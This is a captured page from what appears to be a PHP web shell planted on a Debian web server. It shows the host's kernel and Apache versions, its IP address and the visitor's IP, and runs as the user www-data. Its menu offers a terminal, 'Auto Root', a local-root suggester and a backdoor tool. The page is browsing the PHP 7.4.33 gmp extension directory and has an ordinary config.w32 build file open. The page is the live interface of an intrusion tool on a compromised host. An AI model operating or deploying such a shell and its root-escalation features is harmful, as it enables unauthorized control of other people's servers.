Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.119
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
src /
php-7.4.33 /
ext /
gmp /
Delete
Unzip
Name
Size
Permission
Date
Action
tests
[ DIR ]
drwxrwxr-x
2022-10-31 11:36
CREDITS
35
B
-rw-rw-r--
2022-10-31 11:36
config.m4
945
B
-rw-rw-r--
2022-10-31 11:36
config.w32
495
B
-rw-rw-r--
2022-10-31 11:36
gmp.c
55.89
KB
-rw-rw-r--
2022-10-31 11:36
php_gmp.h
3.01
KB
-rw-rw-r--
2022-10-31 11:36
php_gmp_int.h
836
B
-rw-rw-r--
2022-10-31 11:36
Save
Rename
// vim:ft=javascript ARG_WITH("gmp", "Include GNU MP support.", "no"); if (PHP_GMP != "no") { if (CHECK_LIB("mpir_a.lib", "gmp", PHP_GMP) && CHECK_HEADER_ADD_INCLUDE("gmp.h", "CFLAGS_GMP", PHP_GMP + ";" + PHP_PHP_BUILD + "\\include\\mpir")) { EXTENSION("gmp", "gmp.c", null, "/DZEND_ENABLE_STATIC_TSRMLS_CACHE=1"); PHP_INSTALL_HEADERS("ext/gmp", "php_gmp_int.h"); AC_DEFINE('HAVE_GMP', 1, 'GMP support'); } else { WARNING("GMP not enabled; libraries and headers not found"); } }